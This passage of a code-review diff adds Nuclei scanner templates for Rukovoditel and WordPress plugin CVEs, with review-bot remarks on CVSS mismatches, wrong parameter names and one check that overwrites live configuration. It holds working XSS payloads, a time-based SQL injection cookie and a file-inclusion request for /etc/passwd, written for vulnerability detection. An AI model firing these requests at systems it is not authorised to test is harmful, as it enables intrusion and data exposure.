- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44946
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44946
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'


@ -0,0 +1,61 @@
id: CVE-2022-44947
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/13
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44947
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44947
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true


@ -0,0 +1,59 @@
id: CVE-2022-44948
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/8
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44948
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44948
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
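Review bot: The description has `feature at/index.php?module=entities/entities_groups` — a missing space after `at`; it should read `feature at /index.php?module=entities/entities_groups`. Nothing else in this template departs from the sibling pattern, and it does include the `contains(content_type_3, "text/html")` check that some of the other Rukovoditel templates in the commit lack.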


@ -0,0 +1,128 @@
id: CVE-2022-44949
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/12
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44949
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44949
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="entities_id"
24
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="forms_tabs_id"
29
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="name"
test
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="short_name"
<script>alert(document.domain)</script>
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="type"
fieldtype_input
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[width]"
input-small
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[default_value]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[is_unique]"
0
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="required_message"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip_item_page"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access_template"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[5]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[4]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="notes"
------WebKitFormBoundaryfKx13B5QBU5Sccgf--
cookie-reuse: true
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
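Review bot: The save request hard-codes `entities_id` as `24` and `forms_tabs_id` as `29`, which are identifiers of the instance the template was verified against rather than fixed values of the product, so on an installation where entity 24 or tab 29 does not exist the save is rejected and the check reports nothing. CVE-2022-44950 and CVE-2022-44951 carry the same hard-coded `entities_id=24`. Either obtain the identifiers from a listing page with an `internal: true` extractor, or document the assumption with a comment such as `# assumes an entity with id 24 and a form tab with id 29 exist — installation-specific`.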


@ -0,0 +1,128 @@
id: CVE-2022-44950
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/10
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44950
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44950
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="entities_id"
24
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="forms_tabs_id"
29
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="name"
<script>alert(document.domain)</script>
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="short_name"
test
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="type"
fieldtype_input
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[width]"
input-small
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[default_value]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[is_unique]"
0
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="required_message"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip_item_page"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access_template"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[5]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[4]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="notes"
------WebKitFormBoundaryfKx13B5QBU5Sccgf--
cookie-reuse: true
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true


@ -0,0 +1,59 @@
id: CVE-2022-44951
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/11
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44951
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 5.4
cve-id: CVE-2022-44951
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
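Review bot: The `cvss-metrics` vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` is inconsistent with the `cvss-score: 5.4` and `severity: medium` beside it — that vector scores 9.8 and describes an unauthenticated full-compromise issue, not an authenticated stored XSS. CVE-2022-44952 has the same mismatch. The sibling templates CVE-2022-44948 to CVE-2022-44950 use `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N`, which does correspond to 5.4; use that vector unless the NVD entry for this CVE gives a different one.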


@ -0,0 +1,142 @@
id: CVE-2022-44952
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/9
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44952
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 5.4
cve-id: CVE-2022-44952
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_NAME]"
Test
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
test
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LOGO]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_FAVICON]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
<script>alert(document.domain)</script>
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
english.php
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_SKIN]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
America/New_York
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
10
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
m/d/Y
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
m/d/Y H:i
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
2/./*
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA--
- |
@timeout: 5s
GET /index.php?module=dashboard/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_4 == 200'
- 'contains(content_type_4, "text/html")'
- 'contains(body_4, "<script>alert(document.domain)</script>")'
- 'contains(body_4, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
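Review bot: The third request does not only inject the payload: it submits the whole configuration form and overwrites the target's `CFG[APP_NAME]`, `CFG[APP_SHORT_NAME]`, `CFG[APP_LANGUAGE]`, `CFG[APP_TIMEZONE]`, date/number formats and the other listed settings with the fixed values in the template, so a scan changes the live application's configuration for every user. Nothing in the template states this. At minimum add a comment above the `http:` key, e.g. `# Destructive check: request 3 replaces the application configuration (name, timezone, formats) on the target`, and consider whether the check can be limited to the copyright field if the endpoint accepts a partial form.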


@ -0,0 +1,46 @@
id: CVE-2023-0514
info:
name: Membership Database <= 1.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05
- https://wordpress.org/plugins/member-database/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0514
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "Member Database")'
condition: and
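Review bot: The `name` says `<= 1.0` while the description says "before 1.0"; those describe different version sets, and the wpscan reference should decide which is right — CVE-2023-2272 has the same `<=`/"before" disagreement. The description also attributes the issue to the `tab` parameter, but the request carries the payload in the `value` parameter of the sort form (`action=sort&where=id&operator=%3D&value=...`), so the description appears copied from another template and should name the parameter the request actually uses.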


@ -0,0 +1,36 @@
id: CVE-2023-1730
info:
name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.
remediation: Fixed in version 3.1.5
reference:
- https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7
- https://wordpress.org/plugins/supportcandy/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1730
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1730
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "supportcandy")'
condition: and
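Review bot: This time-based check relies on `duration>=6` but sets no `@timeout` on the raw request, whereas the other SLEEP-based templates in this PR (leaguemanager-sql-injection, notificationx-sqli) start their raw block with `@timeout: 10s`; if the runner's request timeout is shorter than the sleep, the response never arrives and the matcher cannot fire. Add `@timeout: 10s` as the first line of the raw block. `verified: "true"` here, and in CVE-2023-30256, CVE-2023-36287, CVE-2023-36289, CVE-2023-36346 and qdpm-login-panel, is a quoted string while the other templates in this PR use the boolean `true`; pick one form for the whole set.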


@ -0,0 +1,43 @@
id: CVE-2023-1835
info:
name: Ninja Forms < 3.6.22 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341
- https://wordpress.org/plugins/ninja-forms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1835
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1835
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "Ninja Forms")'
condition: and
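Review bot: The description says the payload travels in the `page` parameter, but the request puts it in `title` (`page=nf-processing&title=...`), with `page` only selecting the admin screen; the description should name `title`. The tags `ninja,forms` split the plugin name into two generic tokens; `ninja-forms` (the plugin slug in the reference URL) is the form the other wp-plugin templates use.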


@ -0,0 +1,44 @@
id: CVE-2023-1890
info:
name: Tablesome < 1.0.9 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
- https://wordpress.org/plugins/tablesome/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1890
remediation: Fixed in version 1.0.9.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1890
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert`document_domain`</script>")'
- 'contains(body_2, "tablesome")'
condition: and
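Review bot: The body matcher looks for `document_domain` (underscore) while the request sends `document.domain` (dot); this is presumably intentional, because the payload sits in a query-parameter name and PHP rewrites `.` to `_` in parameter names, but nothing says so and a future edit is likely to "fix" the matcher and silently break the template. Add a comment above the matcher, e.g. `# payload is a parameter name; PHP converts '.' to '_' in names, so the reflection reads document_domain`. If that is not the reason, the mismatch should be confirmed against the wpscan entry.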


@ -0,0 +1,44 @@
id: CVE-2023-2023
info:
name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: Fixed in version 3.7.3
reference:
- https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317
- https://wordpress.org/plugins/custom-404-pro/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2023
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2023
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Custom 404 Pro")'
condition: and


@ -0,0 +1,42 @@
id: CVE-2023-2252
info:
name: Directorist < 7.5.4 - Local File Inclusion
author: r3Y3r53
severity: medium
description: |
Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
remediation: Fixed in version 7.5.4
reference:
- https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
- https://wordpress.org/plugins/directorist/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2252
metadata:
max-request: 2
verified: true
tags: cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
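Review bot: This is the only CVE template in the PR without a `classification` block; `cve-id` and `cwe-id` are what downstream tooling keys on, so add one with `cve-id: CVE-2023-2252` and the CVSS vector, score and CWE taken from the NVD entry referenced above. The `root:[x*]:0:0` regex also only recognises a Unix passwd file, so an affected Windows installation yields no match; that is the usual trade-off, but a comment stating it would help the next reader.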


@ -0,0 +1,46 @@
id: CVE-2023-2272
info:
name: Tiempo.com <= 0.1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
